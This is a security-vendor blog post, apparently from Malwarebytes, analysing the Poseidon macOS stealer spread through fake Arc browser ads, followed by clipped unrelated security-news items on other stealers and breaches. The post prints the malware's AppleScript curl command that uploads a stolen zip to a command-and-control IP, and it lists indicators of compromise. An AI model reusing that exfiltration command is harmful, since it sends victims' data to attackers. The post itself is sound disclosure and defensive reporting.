On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

Rodrigo4 launches new PR campaign

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

Distribution via Google ads

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org:

People who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac only:

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Connection to new Poseidon project

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

More interesting is the data exfiltration which is revealed in the following command:

set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")

Navigating to this IP address reveals the new Poseidon branded panel:

Conclusion

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac will keep detecting this ‘Poseidon campaign as OSX.RodStealer and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

Indicators of Compromise

Google ad domain

arcthost[.]org

Decoy site

arc-download[.]com

Download URL

zestyahhdog[.]com/Arc12645413[.]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192[.]4/p2p

As per recent reports, cybersecurity experts uncovered a troubling development on the Python Package Index (PyPI) – a platform used widely by developers to find and distribute Python packages. A malicious package named ‘crytic-compilers‘ was discovered, mimicking the legitimate ‘crytic-compile’ library developed by Trail of Bits. This fraudulent package was designed with sinister intent: to […]

The post Python Developers Targeted Via Fake Crytic-Compilers Package appeared first on TuxCare.

The post Python Developers Targeted Via Fake Crytic-Compilers Package appeared first on Security Boulevard.

META stealer v5.0 has recently launched, heralding a new phase of advanced and heightened features for the infostealer. This latest version introduces TLS encryption between the build and the C2 panel, a significant enhancement similar to recent updates in other leading stealers like Lumma and Vidar. The update announcement (screenshot below) emphasizes several key improvements aimed at enhancing functionality and security. This includes integration with TLS encryption, ensuring secure communication channels between the build and the control panel. This upgrade highlights the malware developer's commitment to enhance the stealer's capabilities and reach. [caption id="attachment_77605" align="alignnone" width="450"] META stealer 5.0 details (source: X)[/caption]

Decoding the New META Stealer v5.0: Features and Capabilities

The new META Stealer v5.0 update introduces a new build system allowing users to generate unique builds tailored to their specific requirements. This system is supported by the introduction of "Stub token" currency, enabling users to create new Runtime stubs directly from the panel. This feature enhances flexibility and customization options for users. Another notable addition is the "Crypt build" option, enhancing security by encrypting builds to avoid detection during scans. This feature ensures that builds remain undetected at scan time, reinforcing the stealer's stealth capabilities, thus creating the perfect hindering plan for the information stealer. Additionally, the update includes improvements to the panel's security and licensing systems. The redesigned panel incorporates enhanced protection measures, while the revamped licensing system aims to reduce operational disruptions for users.

Previous META Stealer Promises and Upgrades 

The makers of META Stealer released the new update on June 17th, 2024 with a special focus on implementing a new system for generating unique stubs per user. This approach enhances individualized security and also highlights the stealer's commitment to continuous improvement and user satisfaction. Previously, in February 2023, META Stealer underwent significant updates with version 4.3. This update introduced features such as enhanced detection cleaning, the ability to create builds in multiple formats (including *.vbs and *.js), and integration with Telegram for build creation. These enhancements demonstrate META stealer's commitment to target unsuspecting victims.  META stealer continues to evolve with each update, reinforcing its position as a versatile and robust information stealer designed to meet the diverse needs of its user base while continuing targeting victims globally. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Not our fault, says CISO: “UNC5537” breached at least 165 Snowflake instances, including Ticketmaster, LendingTree and, allegedly, Advance Auto Parts.

The post Ticketmaster is Tip of Iceberg: 165+ Snowflake Customers Hacked appeared first on Security Boulevard.

Source: www.databreachtoday.com – Author: 1 Cyberwarfare / Nation-State Attacks , Fraud Management & Cybercrime CERT-UA Says Threat Actor ‘Vermin’ Used Syncthing Application Akshaya Asokan (asokan_akshaya) • June 6, 2024     A U.S. HIMARS system launches ordnance during an exercise in Alaska in October 2020. (Image: U.S. Air Force) Ukrainian cyber defenders said Russian intelligence […]

La entrada Renewed Info Stealer Campaign Targets Ukrainian Military – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.